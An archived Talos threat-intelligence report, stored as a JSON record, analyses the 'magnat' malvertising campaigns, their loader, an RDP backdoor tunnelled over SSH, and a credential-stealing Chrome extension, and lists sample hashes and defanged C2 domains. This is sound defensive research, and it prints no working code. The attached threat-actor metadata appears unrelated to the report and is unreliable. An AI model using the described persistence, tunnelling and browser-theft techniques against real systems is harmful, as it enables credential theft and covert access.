{
	"id": "01679875-be16-41f4-b07f-eb49cdd938f4",
	"created_at": "2026-04-06T01:31:06.260066Z",
	"updated_at": "2026-04-10T03:20:31.153881Z",
	"deleted_at": null,
	"sha1_hash": "84b5cc7e827f2dba7a877290d4bf60858303a3d4",
	"title": "Magnat campaigns use malvertising to deliver information stealer, backdoor and malicious Chrome extension",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4116886,
	"plain_text": "Magnat campaigns use malvertising to deliver information stealer,\r\nbackdoor and malicious Chrome extension\r\nBy Tiago Pereira\r\nPublished: 2021-12-02 · Archived: 2026-04-06 00:56:11 UTC\r\nThursday, December 2, 2021 07:48\r\nBy Tiago Pereira.\r\nTalos recently observed a malicious campaign offering fake installers of popular software as bait to get\r\nusers to execute malware on their systems.\r\nThis campaign includes a set of malware distribution campaigns that started in late 2018 and have targeted\r\nmainly Canada, along with the U.S., Australia and some EU countries.\r\nTwo undocumented malware families (a backdoor and a Google Chrome extension) are consistently\r\ndelivered together in these campaigns.\r\nAn unknown actor with the alias \"magnat\" is the likely author of these new families and has been\r\nconstantly developing and improving them.\r\nThe attacker's motivations appear to be financial gain from selling stolen credentials, fraudulent\r\ntransactions and Remote Desktop access to systems.\r\nIntroduction\r\nTalos recently observed a malware distribution campaign that tries to trick users\r\ninto executing fake software installers of popular software on their systems. We\r\nbelieve with moderate confidence that online advertising is used to reach potential\r\nhttps://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html\r\nPage 1 of 23\n\nvictims that are searching for software to install on their systems. The combination\r\nof advertising and fake software installers is particularly tricky, as the users\r\nreached by the ads are already predisposed to execute an installer on their systems.\r\nOnce the fake installers run, they execute three pieces of malware on the victim's system:\r\nA password stealer that collects all the credentials available on the system.\r\nA \"backdoor\" that sets up remote access via a stealth Microsoft Remote Desktop session by forwarding the\r\nRDP port through an SSH tunnel, allowing access to systems even when behind a firewall.\r\nA malicious browser extension that contains several information-stealing features, such as keylogging and\r\ntaking screenshots.\r\nPassword stealers have long presented a risk to individuals and to companies. The compromised accounts are\r\nfrequently sold in underground forums and may lead to additional compromise using the stolen accounts and\r\nthrough password reuse. The chrome extension adds to this risk by allowing the theft of credentials used on the\r\nweb that may not be stored in the system. Additionally, the use of an SSH tunnel to forward RDP to an external\r\nserver provides attackers with a reliable way to login remotely to a system, bypassing firewall control.\r\nThe campaigns\r\nThe attack begins when a victim looks for a particular piece of software for\r\ndownload. Talos believes the attacker has set up an advertising campaign that will\r\npresent links to a web page, offering the download of a software installer. The\r\ninstaller has many different file names. For example: viber-25164.exe, wechat-35355.exe, build_9.716-6032.exe, setup_164335.exe, nox_setup_55606.exe and\r\nbattlefieldsetup_76522.exe.\r\nWhen executed, this installer does not install the actual software it announces, but instead executes a malicious\r\nloader on the system.\r\nhttps://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html\r\nPage 2 of 23\n\nThe installer/loader is an SFX-7-Zip archive or a nullsoft installer that decodes and drops a legitimate AutoIt\r\ninterpreter, and three obfuscated AutoIt scripts that decode the final payloads in memory and inject them into the\r\nmemory of another process.\r\nThe final payloads are almost always the same three specific pieces of malware:\r\nA commodity password stealer. Initially Azorult and currently Redline. Both steal all the credentials it can\r\nfind on the system. These password stealers are widely known and documented and we will analyse them\r\nfurther on this post.\r\nA backdoor, or backdoor installer that we are calling \"MagnatBackdoor,\" that configures the system for\r\nstealthy RDP access, adds a new user and sets a scheduled task to periodically ping the C2 and, when\r\ninstructed, create an outbound ssh tunnel forwarding the RDP service.\r\nAn installer for a chrome extension, that we are calling \"MagnatExtension,\" that packs several features\r\nuseful for stealing data from the web browser: a form grabber, keylogger, screenshotter, cookie stealer and\r\narbitrary JavaScript executor, among others.\r\nhttps://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html\r\nPage 3 of 23\n\nCampaign timeline\r\nBased on our telemetry and on build dates of analyzed samples, we built a timeline that helps us\r\nunderstand the actor's activities.\r\nOur telemetry is focused only on MagnatBackdoor activity and shows that at the end of 2019, MagnatBackdoor\r\nwas being distributed through early 2020. From that moment on, we had little to no visibility of MagnatBackdoor\r\nagain until April 2021 when the activity seems to have restarted.\r\nThe telemetry data aligns with the build dates of the samples we have found through OSINT. We found almost no\r\nsamples built between February and October 2020. However, we found samples built in late 2020 and early 2021,\r\nfor which we had no visibility in the telemetry. There are several possible reasons for this — most likely, these\r\nmay have been used in test or smaller scale campaigns.\r\nWe also found several interesting pieces of information:\r\nThe oldest MagnatExtension sample we found was dated August 2018. From that date until late 2019, we\r\nfound several samples that delivered the extension and Azorult stealer.\r\nThe oldest MagnatBackdoor sample we found is from October 2019. From that moment on, all samples we\r\nfound contain the trio MagnatBackdoor/MagnatExtension/Azorult.\r\nIn February 2020, just before the large activity gap, Azorult stopped being part of the trio of malware. This\r\nwas possibly a consequence of the release of Chrome 80 that is known to have broken several malware\r\nfamilies.\r\nWe found a small number of samples built in February that include Vidar Stealer and Gozi, suggesting that\r\nthe attacker may have been testing Azorult replacements.\r\nIn October 2020 the actor started testing Redline Stealer, creating some samples using Redline configured\r\nwith the ID \"testing\";\r\nThe campaigns that followed used the Redline / MagnatBackdoor / MagnatExtension trio. Interestingly,\r\nthese campaigns contain Redline IDs that are allusive to advertising campaigns (e.g., ads, ads3, ads5, ads6,\r\nads7, ads8, eumix3, eumix4).\r\nhttps://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html\r\nPage 4 of 23\n\nWe are not sure if the use of malvertising started in October, after the Redline introduction, with the \"ads\" bot ID.\r\nHowever, we believe with moderate confidence (although evidence suggests it, we have not seen the actual ads),\r\nthat malvertising is a delivery method used by the author.\r\nWe started suspecting of malvertising after analysing a few compromised systems. The malicious installer had\r\nbeen downloaded using google chrome, and there was no local email client open. The browser had communicated\r\nonly with cloudflare and google IPs at the moment of the download and in one case, a few seconds prior to the\r\ndownload the browser had visited a software review website.\r\nThese behaviours are not conclusive and they can be explained by other reasons (e.g. blackhat SEO, a webmail\r\nlink). However, we later found the Redline botnet IDs (ads, ads3, ads5, etc.) which strengthened the malvertising\r\ntheory. Finally, we found a tweet from August 2021 by a security researcher mentioning an ongoing malvertising\r\ncampaign, posting screenshots of the ads and sharing one of the downloaded samples.\r\nhttps://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html\r\nPage 5 of 23\n\nAfter analyzing the sample referred to in this tweet, we verified that it is one of the samples that includes\r\nMagnatBackdoor, MagnatExtension and Redline (botnet: ads7).\r\nVictimology\r\nBecause we are looking at a trio of malware with activity since 2018 with multiple C2 addresses\r\nused in every month of activity, it's not easy to find a way to study the targets of these campaigns.\r\nHowever, the domain stataready[.]icu has been used as the MagnatExtension C2 since January\r\n2019 and it is still used today in the settings received from the C2 servers as the updated C2. It\r\naggregates the traffic from infected systems in several campaigns, providing a good overall\r\npicture of the infection distribution through Passive DNS.\r\nPassive DNS shows us the frequency of DNS queries for the C2 address. By looking at the relative distribution of\r\nthe origin of these queries we can have a picture of the Countries more affected by the malware.\r\nThe relatively focused distribution of this malware is consistent with the use of advertising as a distribution\r\nchannel. There is a clear focus on Canada (roughly 50 percent of the infections), followed by the U.S. and\r\nAustralia.\r\nThere are also several infections in Italy, Spain and Norway (Redline's ID \"eumix\" hinted at some interest in\r\nEuropean countries).\r\nMore than 50 percent of the infections are in Canada, which leads us to wonder if there is any more specific target\r\nin that country. However, there is no domain specified in the MagnatExtension settings that is specific to Canada,\r\nand neither MagnatBackdoor or Redline stealer provide any hints.\r\nMalware analysis\r\nhttps://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html\r\nPage 6 of 23\n\nThe loader\r\nThe loader is a .exe or a .iso file pretending to be a software installer. When executed, it creates\r\nseveral files and executes a set of commands that ultimately lead to the execution of the final\r\nmalware payloads.\r\nWe have seen similar loaders delivering other malware and documented by other researchers and believe that the\r\nloader is not specific to these campaigns.\r\nThere are two loader types that, although different in the installer technology used, are very similar in the\r\ntechnique that obfuscates and executes the payloads. A 7-Zip sfx (self-extracting archive) is on one loader, and on\r\nthe other is a NSI (NullSoft Installer) file.\r\nOpening one of the 7-Zip SFX-based loaders with the 7Z SFX builder, we can see the commands that are set to be\r\nexecuted on extraction.\r\nIn this case, the loader uses certutil to decode three of the contained files (dera, sfera and bruto) into three files\r\nthat are very large and highly obfuscated autoIT scripts. Finally, the file dos.com (a legitimate autoIT interpreter)\r\nis used to execute each of the scripts.\r\nOn the NSI based loader, opening the file with 7-Zip, we can see the contents of the archive. The $APPDATA\r\nfolder contains the files to be dropped and the $PLUGINSDIR contains NSI specific files. Finally, the [NSIS].nsi\r\nfile contains the commands that will be executed.\r\nhttps://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html\r\nPage 7 of 23\n\nAs seen in the image above, copto.vsdm seems to be the only cmd file executed. Extracting this file from the\r\n$APPDATA folder and opening it reveals a set of commands that are similar in sequence to the one in the 7-Zip\r\nfile.\r\nLike before, the script performs three times the same actions, with different files:\r\nFIrst, a new file is created containing only the \"MZ\" chars in it.\r\nThen, findstr extracts only the relevant parts from a file filled with junk data and writes them to the file\r\nwith \"MZ.\" This action decodes and writes the legitimate AutoIt interpreter to the system.\r\nThen, a large AutoIt script is copied to a new file with a name of only one character.\r\nFinally, as before, the AutoIt interpreter is used to execute the AutoIt script.\r\nIn both cases, the created script contains the final payload and is very obfuscated. Once executed, it creates a new\r\nprocess (usually the AutoIt interpreter that started it) and injects the final payload into its memory where it will be\r\nhttps://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html\r\nPage 8 of 23\n\nexecuted.\r\nMagnatBackdoor\r\nMagnatBackdoor is an AutoIt-based installer that prepares a system for remote Microsoft Remote\r\nDesktop access and forwards the RDP service port on an outbound SSH tunnel. As a result of this\r\ninstaller's actions there is a way for the attacker to access the system remotely via RDP, which is\r\nwhy we call it a backdoor.\r\nThis malware applies this technique by setting up a scheduled task that periodically contacts a C2 server and sets\r\nup the tunnel if instructed by the C2 response. The following image summarizes the actions taken by the backdoor.\r\nAnalysing the malware sample we find that it was built using AutoIt scripting and then transformed into an\r\nexecutable file. This process leaves several artifacts in the binary that provide useful information.\r\nhttps://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html\r\nPage 9 of 23\n\nThe previous image shows the result of the AutoIt extractor tool. It reveals:\r\nThe build path, including the username magnat. This is the same on all samples we found and it's the\r\nreason we call it MagnatBackdoor and, by extension, the magnat campaigns.\r\nThe build path also includes a string \"\\rdp\\new\\\" that reveals the malware version (\"new\") and a string\r\n\"vago2\" that we believe to be an organizational path, equivalent to a botnet \"group\" or \"id.\"\r\nThe time of file creation and last write. This date was key in building the campaign timeline.\r\nThe list of files packed within the executable.\r\nBased on the build path string, we found samples containing the following versions: \"rdp/rdp,\" \"rdp/3.5,\"\r\n\"rdp/3.6\" and \"rdp/new.\" The changes between versions seemed to be mostly bug fixes and improvements, such as\r\nadding some obfuscation to the network protocol. We will focus on the version \"new\" as it is built upon all\r\nprevious versions.\r\nThe main AutoIt script contains all code and logic needed to install the files we observed in the file list into the\r\nfile system and to execute several scripts. The final objective is to have a set of scheduled tasks (STs) configured\r\non the system that ensure persistence and that connect to the C2 requesting a command for execution. The\r\nfollowing schema shows the key sections of the main installer code.\r\nhttps://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html\r\nPage 10 of 23\n\nAll the scripts starting with PERFORMSCRIPT are very similar. They receive as parameters a set of file paths and\r\nvariables and create a scheduled task XML descriptor by invoking one of the create_xml files and then register the\r\nscheduled task using the schtasks.exe command with the generated XML.\r\nThere are three files that create scheduled tasks. By creating these as scheduled tasks, some additional resiliency is\r\nadded to the malware. For example, if the added user is removed, it will be re-added after some time.\r\nThe first of the scheduled files is add_user.js. This script is responsible for creating a new user, assigning the\r\nappropriate permissions and groups and finally configuring the windows firewall to allow RDP communication.\r\nhttps://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html\r\nPage 11 of 23\n\nThe second scheduled script is obf_pinger_part2.vbs. This script uses some very simplistic obfuscation and is\r\nmostly responsible for installing RDPWrapper. RDPWrapper is an open-source tool that makes very useful\r\nimprovements to RDP. From the project's GitHub:\r\nThe third and last scheduled script is checkFscr.vbs. The checkFscr.vbs script has two main responsibilities:\r\ninstalling plink.exe (an SSH command line tool for Windows) and requesting a command from the C2 server, as\r\nshown in the following image.\r\nThe function will receive an obfuscated string containing the username, password and pinger_id on the first line of\r\nthe snippet. It will then build a string that includes the C2 domain declared in line 2, information about the OS, the\r\nsystem user, the pinger file version and the received string and perform an HTTP GET request to the C2 server,\r\nsending all this information in the querystring.\r\nIf the server responds with an HTTP status code of 201, the response body will be appended to the \"plink.exe\"\r\ncommand. This allows the attacker to send a plink command that creates an ssh tunnel to a remote server,\r\nforwarding the local RDP port to be used for remote access.\r\nhttps://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html\r\nPage 12 of 23\n\nMagnatExtension\r\nWe also found a malicious Google Chrome extension delivered in all these campaigns. Because of\r\nits prevalence in samples that deliver MagnatBackdoor and because we have not seen it\r\nelsewhere, we call it MagnatExtension.\r\nMagnatExtension is delivered by an executable whose only function is to prepare the system and install the\r\nextension. Notice that this extension is installed from the malware itself and not from the Chrome Extension Store.\r\nOnce installed, the extension is visible in the extensions settings as \"Google's Safe browsing.\"\r\nThe extension itself is made of three files — a manifest file, an icon and a background.js file that contains the\r\nmalicious code that runs in the background while the browser is running.\r\nThe extension code is obfuscated using several techniques, such as function redirects, encrypted substitution\r\narrays, function wrappers and string encoding.\r\nWe deobfuscated the JavaScript using a custom Python script. After deobfuscation, we analyzed the code to\r\nunderstand the extension's capabilities.\r\nhttps://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html\r\nPage 13 of 23\n\nFeatures\r\nThis extension is very similar in its features to a banking trojan. It periodically connects to a C2 to receive\r\nthe updated configuration settings. Those settings are then used to control the behavior of the features that\r\nallow stealing data from the browser, such as a form grabber, keylogger and screenshotter, among others.\r\nThe following image summarizes the extension behavior and features.\r\nIn the extension code, at the end of the file, there is a code section where the extension sets up the event listeners\r\nshown in the previous image.\r\nGoing through each of the listeners is an effective way to cover most of the extension features:\r\nForm grabber: The extension listener will capture the onBeforeRequest event whenever a web request is about to\r\nbe made. This allows it to look at the configuration and, if the current URL is in the \"form_URL_filter\" list, it will\r\nread the form using the window[\"requestBody\"][\"formData\"] property and send it to the C2 in a \"form\" action\r\nmessage type.\r\nHistory and scripts: When a browser tab is updated, the extension checks if the tab is loading a URL. If so, the\r\nextension sends a \"history\" request to the C2, which tells the C2 the URL the browser is loading. Finally, it\r\nhttps://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html\r\nPage 14 of 23\n\ncompares the tab URL with the URLs in the \"URL_mask\" field of each item in the \"script\" section of the config.\r\nIf there is a match, the code in the \"code\" field of the matching item is executed in the tab. This way, the extension\r\ncan completely replace the content of a page while leaving the address bar URL and the SSLl icon untouched.\r\nKeylogger: When a browser tab is updated, the extension checks if the tab is loading a URL. If so, the extension\r\ncompares the tab URL with the URLs in the \"keylogger\" section of the config. If there is a match, the extension\r\nexecutes the keylogger code in the tab.\r\nThe keylogger code running in the tab captures all keys pressed by the user and it then sends the log back to the\r\nextension code through a chrome message, for which there is a listener set up.\r\nScreenshoter: When a browser tab is updated, the extension checks if the tab has completed a URL loading. If so,\r\nthe extension compares the tab URL with the URLs in the \"screenshoter\" section of the config. If there is a match,\r\nthe extension executes the chrome['tabs']['captureVisibleTab'] function to capture a screenshot and then sends it to\r\nthe C2 in a \"screenshoter\" type request.\r\nThe C2 communication happens as a result of one of the previously described features and in two additional\r\nmoments:\r\nPeriodic ping: The extension sets up an alarm that will trigger every minute that sends a \"plugin\" type message to\r\nthe C2 server that contains the extension ID version. The server reply is a JSON string that contains the fields\r\ncookie and keylogger. If the cookie variable is true, the extension will collect and send all cookies to the C2\r\nserver. The keylogger field switches on or off a global boolean variable. In earlier versions, this was used to\r\ndisable the keylogger but it has been deactivated in the latest version.\r\nRequest settings: The extension sets up an alarm that will trigger every 30 minutes and will trigger an HTTP GET\r\nrequest to the C2 server settings path without any additional data. If new settings are received, they will be stored\r\nin the browser's local storage.\r\nBot settings\r\nAs previously mentioned, most features use the settings file to check if a particular web page requires action\r\nor not. This setting is provided by the C2 server and stored locally. It has the following structure:\r\nThe settings have changed slightly over time. However, the C2 servers are still the same and have been working\r\nfor around three years, so the old settings are still available.\r\nThe most recent version - settings3.json:\r\nhttps://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html\r\nPage 15 of 23\n\nEarlier version - settings2.json:\r\nFirst version - settings.json:\r\nThe first settings version (settings.json) does not contain a server because it was not possible to update the C2 via\r\nthe settings file. The settings2.json adds the server field and the latest version (settings3.json) contains a form\r\ngrabber active for Facebook URLs. The screenshotter has been active since the first version for the same set of\r\nURLs. This suggests the attacker's motivation is to observe the balances of PayPal accounts and cryptocurrency\r\nwallets and, possibly, request the cookies of those systems.  \r\nhttps://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html\r\nPage 16 of 23\n\nC2 communications\r\nThe C2 address is hardcoded in the sample, and it can be updated by the current C2 with a list of additional\r\nC2 files. Interestingly, although this is disabled in recent versions, when the server check fails, the extension\r\ncan try to obtain a new C2 address from a Twitter hashtag search.\r\nThe following tweets show the hashtags we found in use:\r\nThe algorithm for getting the domain from the tweet is very simple: concatenating the first letter of each word.\r\nUsing the previous tweets as an example, the domains are: stataready.icu and bolshebolshezolota.club.\r\nOnce an active C2 is available, the data is sent in json format in the body of an HTTP POST request. This json\r\nstring is encrypted. In the next section we will describe the encryption used. The following json message types\r\nexist:\r\nhttps://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html\r\nPage 17 of 23\n\nEach message type \"action\" value matches one of the previously described features. Additionally, the \"plugin\"\r\naction is used for the periodic ping message type and its reply contains only two fields used to request the browser\r\ncookies and to disable the keylogger.\r\nThe settings request is different. An HTTP GET request to the settings path (settings.json, settings2.json or\r\nsettings3.json) without any extra data. The response is the configuration file as described in the previous section.\r\nCommunication encryption\r\nCommunication with the C2 is done via HTTP (SSL is used in all the samples we saw) and cryptography is\r\nused to protect the message contents. In all communication to the c2, the HTTP body contains a JSON\r\nstring containing the encryption key encrypted with the server's public key, the AES encrypted text, the\r\ninitialization vector and a salt.\r\nThe code used to encrypt the data is:\r\nThe communication from C2 to bot is unencrypted on the pinger replies but the settings response contains a json\r\nwith encrypted data in the following format.\r\nhttps://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html\r\nPage 18 of 23\n\nThe key is not sent this time, it is hardcoded in the decryption function as follows.\r\nAfter some research we have concluded that the encryption library and the json string formats used by the\r\nextension are based on the cryptojs library, an open source javascript cryptography library.\r\nConclusion\r\nThis research documents a set of malicious campaigns that have been going on for\r\naround three years, delivering a trio of malware, including two previously\r\nundocumented families (MagnatBackdoor and MagnatExtension). During this\r\ntime, these two families have been subject to constant development and\r\nimprovement by their authors — this is likely not the last we hear of them.\r\nWe believe these campaigns use malvertising as a means to reach users that are interested in keywords related to\r\nsoftware and present them links to download popular software. This type of threat can be very effective and\r\nrequires that several layers of security controls are in place, such as, endpoint protection, network filtering and\r\nsecurity awareness sessions.\r\nBased on the use of password stealers and a Chrome extension that is similar to a banking trojan, we assess that\r\nthe attacker's goals are to obtain user credentials, possibly for sale or for his own use in further exploitation. The\r\nmotive for the deployment of an RDP backdoor is unclear. The most likely are the sale of RDP access, the use of\r\nRDP to work around online service security features based on IP address or other endpoint installed tools or the\r\nuse of RDP for further exploitation on systems that appear interesting to the attacker.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nhttps://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html\r\nPage 19 of 23\n\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in\r\nthese attacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat.\r\nhttps://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html\r\nPage 20 of 23\n\nCisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically\r\nand alerts users of potentially unwanted activity on every connected device.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nIOCs\r\nSamples:\r\n0cae9a4e0e73ff75f3ffa7f2d58ee67df34bc93e976609162cd6381ea9eb6f5b\r\nc997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07\r\ncb40a5957081d6030e983bcc3e13122660236379858024cfda932117f8d6125f\r\n9b89464c0543e98d6a96ffaa34b78ef62e48182736482ddd968db17dc9e3076e\r\na3b5da275b97840a1e9e5f553d638bfb8e095102edd305008ca2875294b4deb1\r\nba7bb63b7cf08cfe48aead5ec65e81b35b89f4559d16257ba283f77251c15e32\r\nd06ea637979440edf76a679c0e8608e00dae877bfc10e642a4d9d509be2bb2a9\r\ned5abe5b0b9fb82a455ef0e750f44838e1272e743f079871161a2fa179b081f3\r\n1c602fc24a980135f9736d55986d694a4b542d69e6caa225d99c3e9e9c251a1a\r\n42178057b6914172e9101ddd265d88501e4518a92e854ad2ef6e8401d3bdbd15\r\n45b9894e4cac3c21f28308ee48a0095e9516f8b1c26483c1a58b47a9fbbe27e9\r\n0fde03bd190b9601983c97c4138c5953429a672530f585e53b5725b241c35cbb\r\nb6cf71093407d3548e25adc93ccc867602d5d5860753d480308a81273a483bee\r\n933ac399735239f00815637995c752757d867cc601b80274e62ef613c54cd510\r\n09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e\r\nef44590fa6f19431c0b2182627f95b6b9568bd2700124bfc7abe4a979a363bb6\r\nc8864081450fbf75d2757716ef237e81c4f419c2e2a3e2deb86432e78412f109\r\nea3d8e8c07e87fab40fc0e30daea0307c1f0119c6b63a50759625a1edb777a58\r\n13ce97767c92b0f048b0cb4bf55ce8e928a77dc209c428b02de0a890f8f1ec13\r\nc7e703543814e6b70c0f1b2fe990f0251246dbe7931d7d7ee53b0e559d00e405\r\nhttps://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html\r\nPage 21 of 23\n\nf12649de9f93f6dc29a1c6838779885b733c95d4157f95bc92d3f81f52b41788\r\na70525f4aaf688588a65cb60fb18f9cc69b895d12da87cd39ba58f17db37d531\r\n28529e85f66ccfcc1b3ef43f37398cac1716f191775487a99bfe83a66554397a\r\n6ffc9bacb24ec4484a006dc3183984af2b7eaef0244fa5c0e96020081287ca62\r\n65784e672ccaa01697d47837ef036a06e180b394da60011374a7f4e8f3649492\r\nfbaa11e154c41b8b3e18e6db587d7c9f612ec7a1983aca8ec8a9dbb2322a3a9f\r\n7d22568c2d8f94852b59f5b01b12289419dc2e617c7977d2262e1061906d3fb3\r\n794833762b3a94a9b1e88ffb915352823b7192255aa7ac86bbe9f93a64395854\r\nc915342445a40722379bf91cf3ae3b846c6cd7bac069ad1040e2c22addbca1fd\r\n1109f4f612577ba61a8437309fd8bbd164d942090a10d490d6339f6ffb05f2cf\r\ndf3e587781523f2b9a2080caa9856d52b103302ebf311bbfeea54acb89f4b90d\r\ne2e66789c7f6627bfb270c609bae28cd9df7d369a5ba504dccc623eb11f9e3f2\r\n68aebb2f33f1475abc863495a1bf4a43de6fa267bedad1e64a037f60e3da707d\r\n41f9f0dd85b9d1860cbf707471572619218343e1113fa85158f7083d83fcaa0c\r\nAc1df77c0d6d3c35da7571f49f0f66f144fbcfd442411585e48a82e2f61b1fc1\r\nC2s\r\nMagnatBackdoor:\r\nhttps://chocolatepuma[.]casa/api/ping\r\nhttps://wormbrainteam[.]club/api/ping\r\nhttps://430lodsfb[.]xyz/api/ping\r\nhttps://softstatistic[.]xyz/api/ping\r\nhttps://happyheadshot[.]club/api/ping\r\nhttps://aaabasick[.]fun/api/ping\r\nhttps://nnyearhappy[.]club/api/ping\r\nhttps://teambrainworm[.]club/api/ping\r\nhttps://yanevinovat[.]club/api/ping\r\nhttps://fartoviypapamojetvse[.]club/api/ping\r\nhttps://hugecarspro[.]space/api/ping\r\nhttps://burstyourbubble[.]icu/api/ping\r\nhttps://boogieboom[.]host/api/ping\r\nhttps://cgi-lineup[.]website/api/ping\r\nhttps://newdawnera[.]fun/api/ping/\r\nhttps://bhajhhsy6[.]site/api/ping/\r\nhttps://iisnbnd7723hj[.]digital/api/ping\r\nhttps://sdcdsujnd555w[.]digital/api/ping\r\nMagnatExtension:\r\nstataready[.]icu\r\nbolshebolshezolota[.]club\r\nhttps://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html\r\nPage 22 of 23\n\nluckydaddy[.]xyz\r\nadamantbarbellmethod[.]com\r\nRedline:\r\nuserauto[.]space\r\n22231jssdszs[.]fun\r\nhssubnsx[.]xyz\r\ndshdh377dsj[.]fun\r\nAzorult:\r\nhttp://0-800-email[.]com/index.php\r\nhttp://430lodsfb[.]club/index.php\r\nhttp://ifugonnago[.]site/index.php\r\nhttp://paydoor[.]space/index.php\r\nhttp://430lodsposlok[.]online/index.php\r\nhttp://linkonbak[.]site/index.php\r\nhttp://430lodsposlok[.]site/index.php\r\nhttp://dontbeburrow[.]space/index.php\r\nhttp://430lodsposlok[.]monster/index.php\r\nhttp://430lodsposlok[.]store/index.php\r\nhttp://luckydaddy[.]club/index.php\r\nhttp://metropolibit[.]monster/index.php\r\nhttp://inpriorityfit[.]site/index.php\r\nhttp://maskofmistery[.]icu/index.php\r\nSource: https://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html\r\nhttps://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html\r\nPage 23 of 23",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html"
	],
	"report_names": [
		"magnat-campaigns-use-malvertising-to.html"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775439066,
	"ts_updated_at": 1775791231,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/84b5cc7e827f2dba7a877290d4bf60858303a3d4.pdf",
		"text": "https://archive.orkl.eu/84b5cc7e827f2dba7a877290d4bf60858303a3d4.txt",
		"img": "https://archive.orkl.eu/84b5cc7e827f2dba7a877290d4bf60858303a3d4.jpg"
	}
}